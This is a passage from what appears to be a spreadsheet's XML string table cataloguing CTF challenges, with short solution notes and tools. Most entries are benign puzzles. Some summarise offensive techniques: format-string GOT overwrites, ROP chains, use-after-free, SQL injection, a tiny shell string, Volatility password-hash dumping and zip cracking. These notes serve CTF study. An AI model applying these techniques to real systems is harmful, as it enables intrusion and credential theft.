    <t xml:space="preserve">Bypass the format string protection by overflowing Tag1 into Tag2. Leak a Libc address from the server. writeup overwrites memset@got with system() and then cat the flag </t>
  </si>
  <si>
    <t>pwntools, gdb-peda, hopper, ida, radare2</t>
  </si>
  <si>
    <t>pwn 200</t>
  </si>
  <si>
    <t>achieve RCE</t>
  </si>
  <si>
    <t>eak a GOT pointer usingwrite, apply the right offset and have the binary read in that new address into a GOT pointer. Finally, return to a PLT entry to jump to the one-gadget RCE &amp; enjoy the shell!</t>
  </si>
  <si>
    <t>nanana</t>
  </si>
  <si>
    <t>format string, python script</t>
  </si>
  <si>
    <t>Petition Builder</t>
  </si>
  <si>
    <t>PHP / C++</t>
  </si>
  <si>
    <t>execute a shell</t>
  </si>
  <si>
    <t>Writeup exploits a use after free to read the contents of the system. Upload your payload to the system using a POST request and then use after free to execute the payload</t>
  </si>
  <si>
    <t>shell in 8 bytes: 'sh &lt;&amp;3;'</t>
  </si>
  <si>
    <t>Raptor</t>
  </si>
  <si>
    <t>Login as admin and pwn the server</t>
  </si>
  <si>
    <t>Possible to inject HEX code when you register a user. Use this to dump all of the tables in the database and grab the login information of admin and execute a shell</t>
  </si>
  <si>
    <t>language</t>
  </si>
  <si>
    <t>code50</t>
  </si>
  <si>
    <t>solve simple math equaations automatically</t>
  </si>
  <si>
    <t>binjitsu: python lib to ctf</t>
  </si>
  <si>
    <t>code60</t>
  </si>
  <si>
    <t>find prime numbers</t>
  </si>
  <si>
    <t>write a python script, get a list of prime numbers</t>
  </si>
  <si>
    <t>code90</t>
  </si>
  <si>
    <t>reverse a binary tree</t>
  </si>
  <si>
    <t>exp90</t>
  </si>
  <si>
    <t>reverse the logic after many probes</t>
  </si>
  <si>
    <t>node.js can run and exec command</t>
  </si>
  <si>
    <t>misc50</t>
  </si>
  <si>
    <t>convert strings</t>
  </si>
  <si>
    <t>oct to base64 to ascii</t>
  </si>
  <si>
    <t>misc60</t>
  </si>
  <si>
    <t>base64 to ascii to qrcode</t>
  </si>
  <si>
    <t>rev80</t>
  </si>
  <si>
    <t>reverse tapebagel code</t>
  </si>
  <si>
    <t>python tapebagel interpreter</t>
  </si>
  <si>
    <t>tapebagel.py</t>
  </si>
  <si>
    <t>endian40</t>
  </si>
  <si>
    <t>endian</t>
  </si>
  <si>
    <t>little endian</t>
  </si>
  <si>
    <t>tracking85</t>
  </si>
  <si>
    <t>medimum</t>
  </si>
  <si>
    <t>get gps location</t>
  </si>
  <si>
    <t>verdict90</t>
  </si>
  <si>
    <t>lib pypng</t>
  </si>
  <si>
    <t>verdict140</t>
  </si>
  <si>
    <t>lib base64</t>
  </si>
  <si>
    <t>level0</t>
  </si>
  <si>
    <t>code optimization</t>
  </si>
  <si>
    <t>use hashtable vs an array</t>
  </si>
  <si>
    <t>must know O-time of datastructures</t>
  </si>
  <si>
    <t>Level1</t>
  </si>
  <si>
    <t>re-implement git's object hashing</t>
  </si>
  <si>
    <t>Level2</t>
  </si>
  <si>
    <t>Write Reverse Proxy in Node JS</t>
  </si>
  <si>
    <t>Implment load balancing and rate-limiting</t>
  </si>
  <si>
    <t>Scripted re-submission for higher score.</t>
  </si>
  <si>
    <t>Node.js</t>
  </si>
  <si>
    <t>Level3</t>
  </si>
  <si>
    <t>Hard</t>
  </si>
  <si>
    <t>Build Distributed Instant Code Search</t>
  </si>
  <si>
    <t>Implement Path Shared In-Memory Scan</t>
  </si>
  <si>
    <t>extract the transfered python script using wireshark and fill in the missing function to reverse the encryption</t>
  </si>
  <si>
    <t>Scala</t>
  </si>
  <si>
    <t>Level4</t>
  </si>
  <si>
    <t>Build multi-node highly-avaliable SQL Database that behaves identically to single node</t>
  </si>
  <si>
    <t>Implement Algorithms such as Paxos and Raft in Go</t>
  </si>
  <si>
    <t>Go</t>
  </si>
  <si>
    <t>pcapin</t>
  </si>
  <si>
    <t>echo</t>
  </si>
  <si>
    <t>echo gives clues</t>
  </si>
  <si>
    <t>test 2 letter strings, find sequence that gives perfect every time</t>
  </si>
  <si>
    <t>grab the encrypted image</t>
  </si>
  <si>
    <t>PPC PROBLEM</t>
  </si>
  <si>
    <t>You must bruteforce the 26 XOR keys encrypting the traffic. From there, concatinate the data and open the image containing the flag</t>
  </si>
  <si>
    <t>assorted images</t>
  </si>
  <si>
    <t>get the password</t>
  </si>
  <si>
    <t>You must use steghide on the images however a key is needed. The key is a concatination of all 4 airport abrivation codes from the images 'HAVHKGLAXYYZ'</t>
  </si>
  <si>
    <t>satelite</t>
  </si>
  <si>
    <t>SAT formula</t>
  </si>
  <si>
    <t>solve SAT formula</t>
  </si>
  <si>
    <t>pycosat and picosat</t>
  </si>
  <si>
    <t>sharpturn</t>
  </si>
  <si>
    <t>git repo</t>
  </si>
  <si>
    <t>fix the git repo</t>
  </si>
  <si>
    <t>git repo reports corrupted data. Run an fsck against the repo to dump the files containing error. Fix the errors and run the code for the flag</t>
  </si>
  <si>
    <t>git-commands</t>
  </si>
  <si>
    <t xml:space="preserve">Julian Cohen </t>
  </si>
  <si>
    <t>Google "Julian Cohen CTF" which leads you to an organizers twitter containing the flag</t>
  </si>
  <si>
    <t>4stone</t>
  </si>
  <si>
    <t>Alexander taylor</t>
  </si>
  <si>
    <t>return</t>
  </si>
  <si>
    <t>web challenge</t>
  </si>
  <si>
    <t>jump over environment variables using opcode</t>
  </si>
  <si>
    <t>More web recon / profile digging</t>
  </si>
  <si>
    <t>Chrono Logical</t>
  </si>
  <si>
    <t>OS</t>
  </si>
  <si>
    <t>solve and control timing; NaN</t>
  </si>
  <si>
    <t>3dttt</t>
  </si>
  <si>
    <t>write program to win 3d-tic-tac-toe</t>
  </si>
  <si>
    <t xml:space="preserve">Eric Liang </t>
  </si>
  <si>
    <t>zombies</t>
  </si>
  <si>
    <t>solve the game</t>
  </si>
  <si>
    <t>script to win the game</t>
  </si>
  <si>
    <t>polyglot</t>
  </si>
  <si>
    <t>c and script</t>
  </si>
  <si>
    <t>mandiant</t>
  </si>
  <si>
    <t>find the hidden data</t>
  </si>
  <si>
    <t>Pdf contains a z7 archive which contains a PNG with two base64 encoded strings which convert to hex. Use freefilecamouflage (or binwalk?) to extract an elf which you execute to get the flag</t>
  </si>
  <si>
    <t>find bug</t>
  </si>
  <si>
    <t>ENT_QUOTES flag</t>
  </si>
  <si>
    <t>lugkist</t>
  </si>
  <si>
    <t>identify code and</t>
  </si>
  <si>
    <t>sort by address and build strings, python script</t>
  </si>
  <si>
    <t>http://tuxnes.sourceforge.net/gamegenie.html</t>
  </si>
  <si>
    <t>Qpdf , scalpel, binwalk</t>
  </si>
  <si>
    <t>selftest</t>
  </si>
  <si>
    <t>analyse logic in validation loop, find a valid string to input</t>
  </si>
  <si>
    <t>c0unter</t>
  </si>
  <si>
    <t>python script to change return address</t>
  </si>
  <si>
    <t>data-extraction</t>
  </si>
  <si>
    <t>Joy-300</t>
  </si>
  <si>
    <t>play game</t>
  </si>
  <si>
    <t>greeter</t>
  </si>
  <si>
    <t>write a bot script</t>
  </si>
  <si>
    <t>You need to look at the image and realize that the image represents DNA and RNA. From there you can convert the individual symbols into their corrsoponding Ammino Acid and some other basic scripting stuff</t>
  </si>
  <si>
    <t>NaNNaNNaNNan…, Batman!</t>
  </si>
  <si>
    <t>examine c code</t>
  </si>
  <si>
    <t>enter the only value that satisfies the conditions</t>
  </si>
  <si>
    <t>reverse100</t>
  </si>
  <si>
    <t>Reach the 2048 tile in less than 3:30 minutes</t>
  </si>
  <si>
    <t>python script to rotate right</t>
  </si>
  <si>
    <t>Write AI to play the game and solve the challenge</t>
  </si>
  <si>
    <t>c, python</t>
  </si>
  <si>
    <t>Reversing 2</t>
  </si>
  <si>
    <t>javascript jail</t>
  </si>
  <si>
    <t>windows executable</t>
  </si>
  <si>
    <t>Modifiy javascript code to give flag</t>
  </si>
  <si>
    <t>change the value of eax manually and step through program</t>
  </si>
  <si>
    <t>Replace math.random with trivial function, replace array functions</t>
  </si>
  <si>
    <t>OllyDbg</t>
  </si>
  <si>
    <t>opentoal</t>
  </si>
  <si>
    <t>PPC 200</t>
  </si>
  <si>
    <t>static</t>
  </si>
  <si>
    <t>run code with correct arguments</t>
  </si>
  <si>
    <t>open in disassembler, look for value that function looks for to return 0 and print flag</t>
  </si>
  <si>
    <t>switchy</t>
  </si>
  <si>
    <t>Espionage</t>
  </si>
  <si>
    <t>extract flag with ida python scrypt, import idaapi</t>
  </si>
  <si>
    <t>Wireshark contains an email with a wav file attached. Opening the wavfile in a spectrum analyzer you see a picture of batman. Which is the flag.</t>
  </si>
  <si>
    <t>Wireshark, sstv software</t>
  </si>
  <si>
    <t>Four-Eyes</t>
  </si>
  <si>
    <t>filter the traffic based on 'http.host eq www.2dehands.be'. Follow the TCP traffic and you will find a POST request containing the login details</t>
  </si>
  <si>
    <t>Passwords</t>
  </si>
  <si>
    <t>Windows memory dump</t>
  </si>
  <si>
    <t>Network 400</t>
  </si>
  <si>
    <t>Analyze the dump using Vollatility. Cmd 1: 'vol.py -f memdump.mem imageinfo', cmd 2: 'vol.py -f memdump.mem --profile=Win7SP1x64 hivelist'. Copy the address of SYSTEM and SAM then use CMD 3: 'vol.py -f memdump_password.mem --profile=Win7SP1x64 hashdump -y SYSTEMADDR -s SAMADDR' Which will dump the hash of the user account. google the hash to find it corrosponds to abc123</t>
  </si>
  <si>
    <t>find uptime, and find string that matches SHA1 given</t>
  </si>
  <si>
    <t>entry language</t>
  </si>
  <si>
    <t>Set a breakpoint at address '0x400784' and step through the code and steal the values from $edx</t>
  </si>
  <si>
    <t>Sudoku Image</t>
  </si>
  <si>
    <t>link and switch</t>
  </si>
  <si>
    <t>Bypass the Ptrace check, and step through the elements of the linked list to grab the flag 'rotors'</t>
  </si>
  <si>
    <t>Wardriving</t>
  </si>
  <si>
    <t>gas stations</t>
  </si>
  <si>
    <t>lbs checker</t>
  </si>
  <si>
    <t>filter the traffic based on 'http.host contains tribalwars''. Follow the TCP traffic and you will find a POST (frame 6641) request containing the login details</t>
  </si>
  <si>
    <t>Bypass multiple security checks, set various breakpoints around the password check function to grab the required password</t>
  </si>
  <si>
    <t>Calculate optimal distances between gas stations</t>
  </si>
  <si>
    <t>Write python script to calculate optimal distance for some gas stations (Programming)</t>
  </si>
  <si>
    <t>SFTP</t>
  </si>
  <si>
    <t>python module Sklearn, K-means</t>
  </si>
  <si>
    <t>Master of Reversing</t>
  </si>
  <si>
    <t>Choose the number</t>
  </si>
  <si>
    <t>Connect to the SFTP server using the provided credentials. find the flag and send a SEND command to the server. capture the traffic with wireshark to get the flag</t>
  </si>
  <si>
    <t>answer a lot of problems</t>
  </si>
  <si>
    <t>python script to automate answers</t>
  </si>
  <si>
    <t xml:space="preserve">Password is casted into a DWORD then a byte table is decoded and XOR'd with the DWORD and then executed as code. You must then write a script to analyze the byte frequency between the encoded block and decoded block. </t>
  </si>
  <si>
    <t>solve 24 problems in under 2 min</t>
  </si>
  <si>
    <t>finger</t>
  </si>
  <si>
    <t>access control</t>
  </si>
  <si>
    <t>boss damage</t>
  </si>
  <si>
    <t>script to make boss deal less damage</t>
  </si>
  <si>
    <t>reverse engineer the password deviation algorithm and translate to printable form</t>
  </si>
  <si>
    <t>game maps to QR code, turn to ascii characters</t>
  </si>
  <si>
    <t>g++</t>
  </si>
  <si>
    <t>bruteforce key in groups of four bytes</t>
  </si>
  <si>
    <t>Lost to Time</t>
  </si>
  <si>
    <t xml:space="preserve">What does the given program do? </t>
  </si>
  <si>
    <t xml:space="preserve">convert given instructions in compass assembly to your choice of language and run the program </t>
  </si>
  <si>
    <t xml:space="preserve">XZ, https://en.wikipedia.org/wiki/CDC_6000_series#Central_processor, https://en.wikipedia.org/wiki/COMPASS, </t>
  </si>
  <si>
    <t>COMPASS Assembly</t>
  </si>
  <si>
    <t>As Seen On Defcon</t>
  </si>
  <si>
    <t xml:space="preserve">x86 asm and x86 ARM </t>
  </si>
  <si>
    <t xml:space="preserve">Convert an X86 EBFE intruction to the equivilent ARM instruction. </t>
  </si>
  <si>
    <t xml:space="preserve">mesh python,ruby, and c </t>
  </si>
  <si>
    <t>access code</t>
  </si>
  <si>
    <t>python ruby c</t>
  </si>
  <si>
    <t>babypolyquine</t>
  </si>
  <si>
    <t>find the access code</t>
  </si>
  <si>
    <t>submit quine</t>
  </si>
  <si>
    <t>use foremost, decrypt keyed caesar cipher with tool</t>
  </si>
  <si>
    <t>send NULL byte</t>
  </si>
  <si>
    <t>foremost, http://rumkin.com/tools/cipher/caesar-keyed.php</t>
  </si>
  <si>
    <t>C, Python 2, Python 3, Ruby, and Perl</t>
  </si>
  <si>
    <t>geonewbie</t>
  </si>
  <si>
    <t>solve geography problems</t>
  </si>
  <si>
    <t>PolyQuine</t>
  </si>
  <si>
    <t>match output</t>
  </si>
  <si>
    <t>255,255,255 is the best color</t>
  </si>
  <si>
    <t>find the flag in the file</t>
  </si>
  <si>
    <t>use go.py to get a bmp from the tect file, view image</t>
  </si>
  <si>
    <t>https://github.com/ctfs/write-ups-2015/blob/master/pragyan-ctf-2015/misc/255_255_255_is_the_best_color/go.py</t>
  </si>
  <si>
    <t>Klug</t>
  </si>
  <si>
    <t>are you a good ripper</t>
  </si>
  <si>
    <t>password protected zip</t>
  </si>
  <si>
    <t>crack zipped files</t>
  </si>
  <si>
    <t>use wordlist and fcrack to extract flag.txt</t>
  </si>
  <si>
    <t>SATBeginner</t>
  </si>
  <si>
    <t>Decompile the binary, fix the symbolic values in the binary, grab the LLVM bitcode and run KLEE on the bitcode for the flag</t>
  </si>
  <si>
    <t>binary satisfaction</t>
  </si>
  <si>
    <t>fcrackzip, rockyou.txt wordlist</t>
  </si>
  <si>
    <t>PicoSAT (https://pypi.python.org/pypi/pycosat)</t>
  </si>
  <si>
    <t>knockedup</t>
  </si>
  <si>
    <t>don't stop</t>
  </si>
  <si>
    <t>extremely easy</t>
  </si>
  <si>
    <t>look for flag</t>
  </si>
  <si>
    <t>reverse the binary to figure out the correct network protocol and ports used. Create your own script to port knock in the correct order to get the flag</t>
  </si>
  <si>
    <t>strings -a Proxy.jpg'</t>
  </si>
  <si>
    <t>Ugly bin</t>
  </si>
  <si>
    <t>CSIC binary</t>
  </si>
  <si>
    <t>emma watson</t>
  </si>
  <si>
    <t>make a copy of the binary, modify the invalid bytes on that copy, and then decompile it.</t>
  </si>
  <si>
    <t>ida, hopper, radare2</t>
  </si>
  <si>
    <t>use carve.py, decode binary to ASCII</t>
  </si>
  <si>
    <t xml:space="preserve">virtual virtue </t>
  </si>
  <si>
    <t>https://github.com/ctfs/write-ups-2015/blob/master/pragyan-ctf-2015/stegano/emma_watson/carve.py</t>
  </si>
  <si>
    <t>OSX Binary</t>
  </si>
  <si>
    <t>ppc200</t>
  </si>
  <si>
    <t>modify the structure responsible for storing char input to hold all of the high scoring values (reversing)</t>
  </si>
  <si>
    <t>ports are a maze</t>
  </si>
  <si>
    <t>write script to navigate through ports using formulas</t>
  </si>
  <si>
    <t>secret library</t>
  </si>
  <si>
    <t>ppc300</t>
  </si>
  <si>
    <t>DNA replication</t>
  </si>
  <si>
    <t>put on your reading glasses</t>
  </si>
  <si>
    <t xml:space="preserve">Reverse the binary to find the special values to achieve proper control flow, then beat the guessing game. </t>
  </si>
  <si>
    <t>find most common string</t>
  </si>
  <si>
    <t>Hopper, Ida, Radare2</t>
  </si>
  <si>
    <t>flag in file</t>
  </si>
  <si>
    <t>Solution Checker</t>
  </si>
  <si>
    <t>cat test.html | sed 's/rgb(255, 255, 254)/rgb(0,0,0)/g' &gt; test2.html' then use tool to read QR code</t>
  </si>
  <si>
    <t>http://zxing.org/w/decode.jspx</t>
  </si>
  <si>
    <t>Your input is checked against an unknown value and must pass. Reading information on PCRE and tracing your inputs helps you solve the challenege</t>
  </si>
  <si>
    <t>Koolmogorov</t>
  </si>
  <si>
    <t>find out what the program does</t>
  </si>
  <si>
    <t>load pyth into py3 intepreter and reverse operations</t>
  </si>
  <si>
    <t>pyth</t>
  </si>
  <si>
    <t>Prodmanager</t>
  </si>
  <si>
    <t>manage oroduct</t>
  </si>
  <si>
    <t>reverse400</t>
  </si>
  <si>
    <t>pin checker</t>
  </si>
  <si>
    <t>write script to find pin in certain memory range</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/aa299374(v=vs.60).aspx</t>
  </si>
  <si>
    <t>Zoo</t>
  </si>
  <si>
    <t>both x64 and x86</t>
  </si>
  <si>
    <t>something is different</t>
  </si>
  <si>
    <t>look at difference</t>
  </si>
  <si>
    <t>use tool, replaced digits form a triangle, flag is traingle</t>
  </si>
  <si>
    <t>http://www.free-ocr.com/</t>
  </si>
  <si>
    <t>experiment</t>
  </si>
  <si>
    <t>Answer 50 questions</t>
  </si>
  <si>
    <t>what you see is what you get</t>
  </si>
  <si>
    <t>answer questions and python script</t>
  </si>
  <si>
    <t>Sequence Hunt</t>
  </si>
  <si>
    <t>binwalk to fin zip file, steghide to extract hidden data, extract passphrase 'strings -a stego\_50.jpg'</t>
  </si>
  <si>
    <t>cannotberun</t>
  </si>
  <si>
    <t>binwalk, steghide</t>
  </si>
  <si>
    <t>Using differences in timing guess the magic integers (programming)</t>
  </si>
  <si>
    <t>linux command: time</t>
  </si>
  <si>
    <t>PE32 Exe</t>
  </si>
  <si>
    <t>js and png</t>
  </si>
  <si>
    <t>ctfclicker</t>
  </si>
  <si>
    <t>Open the binary in any disassembler and you'll find the hardcoded flag in main()</t>
  </si>
  <si>
    <t>radare2, hopper, ida</t>
  </si>
  <si>
    <t>grep -ri flag ctf'</t>
  </si>
  <si>
    <t>write script to solve in 40 seconds, shorcut states of game</t>
  </si>
  <si>
    <t>seccon wars 2015</t>
  </si>
  <si>
    <t>Abuse integer underflow / overflow to create the two numbers needed to solve the problems</t>
  </si>
  <si>
    <t>download YT video, use VLC to view QR code</t>
  </si>
  <si>
    <t>VLC (Tools -&gt; Preferences -&gt; Show Settings : all -&gt; Vidoe -&gt; enable : scene video filter)</t>
  </si>
  <si>
    <t>Steganography 1</t>
  </si>
  <si>
    <t>gpjb</t>
  </si>
  <si>
    <t>find image in file</t>
  </si>
  <si>
    <t>use binwalk to find files, scalpel with custom config to extract</t>
  </si>
  <si>
    <t>binwalk, scalpel https://github.com/ctfs/write-ups-2015/blob/master/seccon-quals-ctf-2015/stegano/steganography-1/scalpel.conf</t>
  </si>
  <si>
    <t>simple hash</t>
  </si>
  <si>
    <t>Steganography 2</t>
  </si>
  <si>
    <t>use a hex edito to correct file</t>
  </si>
  <si>
    <t>pngcheck</t>
  </si>
  <si>
    <t>Steganography 3</t>
  </si>
  <si>
    <t>read message</t>
  </si>
  <si>
    <t>find ELF to get base64 output, apply filter to image</t>
  </si>
  <si>
    <t>graphics interchange format</t>
  </si>
  <si>
    <t>hex editor reveals flag</t>
  </si>
  <si>
    <t>hello world</t>
  </si>
  <si>
    <t>windows crashing</t>
  </si>
  <si>
    <t>initialize an input m to the lowest cumulative ASCII value for that string length (ie. all "0" characters) and for each position incrementally test whether a given candidate character at that position could be eligible.</t>
  </si>
  <si>
    <t>name of program (qwerty)</t>
  </si>
  <si>
    <t>impromptu get</t>
  </si>
  <si>
    <t>need username/password</t>
  </si>
  <si>
    <t>research router for default login info</t>
  </si>
  <si>
    <t>tons of flags</t>
  </si>
  <si>
    <t>merge all into a single binary file, gives new png with flag</t>
  </si>
  <si>
    <t>invisble1337</t>
  </si>
  <si>
    <t>looks like morse code</t>
  </si>
  <si>
    <t>decode braille</t>
  </si>
  <si>
    <t>pinkie-pie</t>
  </si>
  <si>
    <t>all one color</t>
  </si>
  <si>
    <t>random colour map</t>
  </si>
  <si>
    <t>simplepassword</t>
  </si>
  <si>
    <t>guess password</t>
  </si>
  <si>
    <t>tells you 4 most used password 'love' 'sex' 'secret' 'and', try all 4 passwords</t>
  </si>
  <si>
    <t>watch me surf the internet</t>
  </si>
  <si>
    <t>read in wireshark</t>
  </si>
  <si>
    <t>use wireshark to extract the source port and pipe it with python to turn into string</t>
  </si>
  <si>
    <t>tshark -r spying.pcapng -Y 'ip.dst == 192.168.64.22' -T fields -e tcp.srcport | python -c 'import sys; print "".join(chr(int(port) - 10000) for port in</t>
  </si>
  <si>
    <t xml:space="preserve">ascii integer overflow </t>
  </si>
  <si>
    <t>danklang</t>
  </si>
  <si>
    <t>unknown language</t>
  </si>
  <si>
    <t>python script to interpret</t>
  </si>
  <si>
    <t>mathproblem</t>
  </si>
  <si>
    <t>solve</t>
  </si>
  <si>
    <t>Brute-force with breadth-fisrt search</t>
  </si>
  <si>
    <t xml:space="preserve">statistics </t>
  </si>
  <si>
    <t>solve the problems</t>
  </si>
  <si>
    <t>Moneygame</t>
  </si>
  <si>
    <t>frag grenade</t>
  </si>
  <si>
    <t>write a python script to parse the operation and given numbers and solve</t>
  </si>
  <si>
    <t xml:space="preserve">Automate the following process: Calculate the peaks and valleys of each stock listing. Claculate the largest profit margins for each stock using the peaks and valleys. Sort all profit margins together. Attempth to fill the 54 weeks based on the profit margins to get the first flag. There exists a second flag in the binary accessable after you win the game, the second flag is accessed via a format string vuln. change the file opened from flag1 to flag2 </t>
  </si>
  <si>
    <t>imaged</t>
  </si>
  <si>
    <t>binjitsu, python</t>
  </si>
  <si>
    <t>find the file with the code that runs the password, run it and then sha256 the password</t>
  </si>
  <si>
    <t>IDAT chunks, CRC checksum</t>
  </si>
  <si>
    <t>ninja turtles</t>
  </si>
  <si>
    <t>Bonkers Banker</t>
  </si>
  <si>
    <t>shapes</t>
  </si>
  <si>
    <t>file makes shapes the spell 'SLASH', run the md5 message-digest algorithm with slash</t>
  </si>
  <si>
    <t>Solve the challeneges</t>
  </si>
  <si>
    <t>write script to solve all of the given challenges according to the given algorithim (programming)</t>
  </si>
  <si>
    <t>surprise modafucka</t>
  </si>
  <si>
    <t>Erratic elder</t>
  </si>
  <si>
    <t>wont open properly</t>
  </si>
  <si>
    <t>Guess the magic number</t>
  </si>
  <si>
    <t>open in hex editor, flag inside</t>
  </si>
  <si>
    <t>find the numbers upperbound and then use binary search to find the correct number (programming)</t>
  </si>
  <si>
    <t>making love to bugs</t>
  </si>
  <si>
    <t>password logic</t>
  </si>
  <si>
    <t>easy to guess password</t>
  </si>
  <si>
    <t>clark kent</t>
  </si>
  <si>
    <t>my little grep quest</t>
  </si>
  <si>
    <t>puzzleng</t>
  </si>
  <si>
    <t>given rar, find flag</t>
  </si>
  <si>
    <t>each file contains a letter of the flag and a path to the next file containing the same, automate. (programming)</t>
  </si>
  <si>
    <t>new generation of puzzle</t>
  </si>
  <si>
    <t>Decode 4 pieces, python script for the rest</t>
  </si>
  <si>
    <t>With a speed force</t>
  </si>
  <si>
    <t>We're not quick enough to register</t>
  </si>
  <si>
    <t>write a simple script / download macro tool to spam the website's register button (programming)</t>
  </si>
  <si>
    <t>fireblossom</t>
  </si>
  <si>
    <t>use fireblossom</t>
  </si>
  <si>
    <t>ropcalc-225</t>
  </si>
  <si>
    <t>random values</t>
  </si>
  <si>
    <t>python script rop chain</t>
  </si>
  <si>
    <t>use openat syscall to read /flag file</t>
  </si>
  <si>
    <t>piranha gun</t>
  </si>
  <si>
    <t>flag on device</t>
  </si>
  <si>
    <t>spam-100</t>
  </si>
  <si>
    <t>unmount device named 'chest' to reveal hidden file</t>
  </si>
  <si>
    <t>python script overwrite __reduce__</t>
  </si>
  <si>
    <t>unreadable</t>
  </si>
  <si>
    <t>raw data</t>
  </si>
  <si>
    <t>read file</t>
  </si>
  <si>
    <t>open data in hex editor</t>
  </si>
  <si>
    <t>autoaggressive desensitization</t>
  </si>
  <si>
    <t>Hello World!</t>
  </si>
  <si>
    <t>RTP data</t>
  </si>
  <si>
    <t>secret message in source</t>
  </si>
  <si>
    <t>print Hello, EasyCTF!</t>
  </si>
  <si>
    <t>extract data and view with audacity, view spectrum and apply filters</t>
  </si>
  <si>
    <t>open('hello-world.out','w').write('Hello, EasyCTF!\n')</t>
  </si>
  <si>
    <t>audacity, Wireshark</t>
  </si>
  <si>
    <t>easy stegano</t>
  </si>
  <si>
    <t>easy to solve</t>
  </si>
  <si>
    <t>Sum it!</t>
  </si>
  <si>
    <t>base64 data hidden in jpg</t>
  </si>
  <si>
    <t>sum numbers</t>
  </si>
  <si>
    <t>private eyes</t>
  </si>
  <si>
    <t>find hidden base64 string in image</t>
  </si>
  <si>
    <t>If logic</t>
  </si>
  <si>
    <t>ultimate steg</t>
  </si>
  <si>
    <t>use if logic</t>
  </si>
  <si>
    <t>key hidden in file</t>
  </si>
  <si>
    <t>extract jpg with foremost, permuate 6 pieces to generate flag, python script</t>
  </si>
  <si>
    <t>binwalk, foremost, exiftool, outguess, stegsolve</t>
  </si>
  <si>
    <t>Can you even???</t>
  </si>
  <si>
    <t>Forensics 1</t>
  </si>
  <si>
    <t>print even numbers</t>
  </si>
  <si>
    <t>identify hidden file</t>
  </si>
  <si>
    <t>use xplico to reconstruct web pages</t>
  </si>
  <si>
    <t>xplico</t>
  </si>
  <si>
    <t>math class</t>
  </si>
  <si>
    <t>Forensics 2</t>
  </si>
  <si>
    <t>add/subtract numbers</t>
  </si>
  <si>
    <t>text</t>
  </si>
  <si>
    <t>find hidde message</t>
  </si>
  <si>
    <t>brainfuck program, use interpreter</t>
  </si>
  <si>
    <t>Forensics 3</t>
  </si>
  <si>
    <t>Sort-of easy</t>
  </si>
  <si>
    <t>sort number</t>
  </si>
  <si>
    <t>rom</t>
  </si>
  <si>
    <t>find hidden key</t>
  </si>
  <si>
    <t>remove empty files and directories, find image</t>
  </si>
  <si>
    <t>Fix the binary with HT, replace the bad headers with the correct ones. Then use LD_PRELOAD to load a shared object that bypasses the debugging checks and will allow for normal execution</t>
  </si>
  <si>
    <t>Forensics 4</t>
  </si>
  <si>
    <t>easyCTF day</t>
  </si>
  <si>
    <t>pmem</t>
  </si>
  <si>
    <t>extract indexOf</t>
  </si>
  <si>
    <t>document.body.innerText.match(/3\.14.*?1103/).toString().replace(/\s/g,'').replace('.','').indexOf('1103')+1;</t>
  </si>
  <si>
    <t>use Rekall Memory Forensics Framework to view memory dump, show pagefiles</t>
  </si>
  <si>
    <t>Rekall Memory Forensic Framework</t>
  </si>
  <si>
    <t>looking for letters</t>
  </si>
  <si>
    <t>find letters</t>
  </si>
  <si>
    <t>Trivia 4</t>
  </si>
  <si>
    <t>change image to text, python script to convert to ASCII</t>
  </si>
  <si>
    <t>OCR engine</t>
  </si>
  <si>
    <t>string change</t>
  </si>
  <si>
    <t>array logic</t>
  </si>
  <si>
    <t>Trivia 5</t>
  </si>
  <si>
    <t>find Malbolge interpreter (http://www.matthias-ernst.eu/malbolge/malbolge)</t>
  </si>
  <si>
    <t>oink</t>
  </si>
  <si>
    <t>add letters to certain words</t>
  </si>
  <si>
    <t>Malbolge interpreter</t>
  </si>
  <si>
    <t>crackme prime</t>
  </si>
  <si>
    <t>Write a keygen to generate a valid serial number</t>
  </si>
  <si>
    <t>oink oink</t>
  </si>
  <si>
    <t>forensics-1</t>
  </si>
  <si>
    <t>use set of clues from tools, exiftool gives base64 of a md5 hash then use hash cracker to get password to flag</t>
  </si>
  <si>
    <t>https://github.com/YASME-Tim/crypto-tools/tree/master/crackmd5</t>
  </si>
  <si>
    <t>obsfuscated</t>
  </si>
  <si>
    <t>obfuscated python code</t>
  </si>
  <si>
    <t>solve by hand</t>
  </si>
  <si>
    <t>forensics-2</t>
  </si>
  <si>
    <t>Mass Surveillance Software</t>
  </si>
  <si>
    <t>haas</t>
  </si>
  <si>
    <t>prolog</t>
  </si>
  <si>
    <t>hidden clue</t>
  </si>
  <si>
    <t>concat two atoms and use call function to by pass filter</t>
  </si>
  <si>
    <t xml:space="preserve">Pull the serial checking functions from the binary and use crunchwordlist to generate a valid wordlist for serials. </t>
  </si>
  <si>
    <t>exiftool picture gives hex values, convert to ascii and is base64 then decode to flag</t>
  </si>
  <si>
    <t>forensics-4</t>
  </si>
  <si>
    <t>file is ascii strings</t>
  </si>
  <si>
    <t>decode base64 into another png file that contains flag</t>
  </si>
  <si>
    <t>john-pastry-shop</t>
  </si>
  <si>
    <t>JAR</t>
  </si>
  <si>
    <t>forensics-5</t>
  </si>
  <si>
    <t>self-signed certificate with same fields as original</t>
  </si>
  <si>
    <t>Ollydbg, Immunity Debuggers</t>
  </si>
  <si>
    <t>exiftool, base64 decodes into morse code</t>
  </si>
  <si>
    <t>forensics-6</t>
  </si>
  <si>
    <t>exiftool, character decode into a bit.ly link that has a qr code, decode qr for flag</t>
  </si>
  <si>
    <t>catz</t>
  </si>
  <si>
    <t>us extundelete to recover deleted files, cat file</t>
  </si>
  <si>
    <t>doggie</t>
  </si>
  <si>
    <t>edgy</t>
  </si>
  <si>
    <t>solve puzzle</t>
  </si>
  <si>
    <t>jpeg, exiftool gives hex location of flag, use to extract flag from picture</t>
  </si>
  <si>
    <t>exiftool a038218191c05846099054a9f21ff22a.png | grep --color=none Author | awk '{print $3}' | sed 's/\.//g' | grep --color=none -o "....." | while read p; do xxd "-s0x$p" -l1 -p a038218191c05846099054a9f21ff22a.png; done | xxd -r -p</t>
  </si>
  <si>
    <t>misc 300</t>
  </si>
  <si>
    <t>Superman</t>
  </si>
  <si>
    <t>Solve captcha images</t>
  </si>
  <si>
    <t>Write a python script to solve the 500 captchas (programming)</t>
  </si>
  <si>
    <t>Py image library, pytesseract, tesseracta</t>
  </si>
  <si>
    <t>using ida and gdbserver set a hardware breakpoint at '0804913F'. Then use a LD_Preload trick similar to the clark kent challenege. The exe will eventually call a brainfuck vm that generates the flag</t>
  </si>
  <si>
    <t>IDA, gdb</t>
  </si>
  <si>
    <t>re 200</t>
  </si>
  <si>
